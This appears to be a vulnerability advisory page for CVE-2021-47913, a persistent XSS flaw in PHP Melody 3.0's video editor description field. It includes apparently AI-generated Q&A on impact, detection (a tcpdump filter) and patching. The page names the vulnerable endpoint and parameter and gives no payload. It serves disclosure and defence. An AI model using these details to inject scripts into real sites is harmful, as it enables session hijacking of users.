CVE-2021-47913
Persistent XSS in PHP Melody 3.0 Video Editor Enables Session Hijacking
Publication date: 2026-02-01
Last updated on: 2026-02-11
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| phpsugar | php_melody | 3.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The provided resources do not explicitly discuss the impact of this vulnerability on compliance with common standards and regulations such as GDPR or HIPAA. However, since the vulnerability allows persistent cross-site scripting leading to session hijacking and unauthorized application manipulation, it could potentially result in unauthorized access to sensitive user data, which may affect compliance with data protection regulations. Proper mitigation and patching are necessary to maintain compliance. [1, 2]
Can you explain this vulnerability to me?
CVE-2021-47913 is a persistent cross-site scripting (XSS) vulnerability in PHP Melody version 3.0, specifically in the video editor's WYSIWYG editor. It allows privileged users, such as editors or moderators, to inject malicious scripts into the episode description via the video editor interface. These scripts persist in the application and execute whenever the affected content is viewed, enabling attackers to perform actions like session hijacking and manipulation of the application. [1, 2]
How can this vulnerability impact me? :
This vulnerability can lead to session hijacking, persistent phishing attacks, unauthorized external redirects, and manipulation of application modules. Attackers with editor-level privileges can inject malicious scripts that execute persistently, potentially compromising user sessions and allowing unauthorized control or manipulation of the application. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for suspicious or crafted GET requests targeting the video editor's `episode_id` parameter, especially those containing script payloads. Detection involves inspecting HTTP requests to the `edit-episode.php` file for malicious input in the `description` parameter submitted via the video editor interface. Commands to detect such activity could include using network traffic analysis tools like tcpdump or Wireshark to filter HTTP GET requests to the affected endpoint, or using web application firewall (WAF) logs to identify attempts to inject scripts. For example, a command to capture HTTP GET requests to the vulnerable endpoint might be: `tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep 'GET /edit-episode.php?episode_id='`. Additionally, scanning the database for suspicious script tags or iframe elements in the `description` fields can help detect persistent XSS payloads. [2]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include applying the vendor-provided patch released by September 22, 2021, which properly encodes and sanitizes all inputs to the TinyMCE editor, especially the `description` parameter. Until the patch is applied, restrict privileged user access to the video editor module to trusted personnel only, monitor and audit editor activities closely, and implement input validation and output encoding to prevent script injection. Additionally, deploying a web application firewall (WAF) with rules to block malicious script payloads targeting the video editor can help reduce exploitation risk. [2]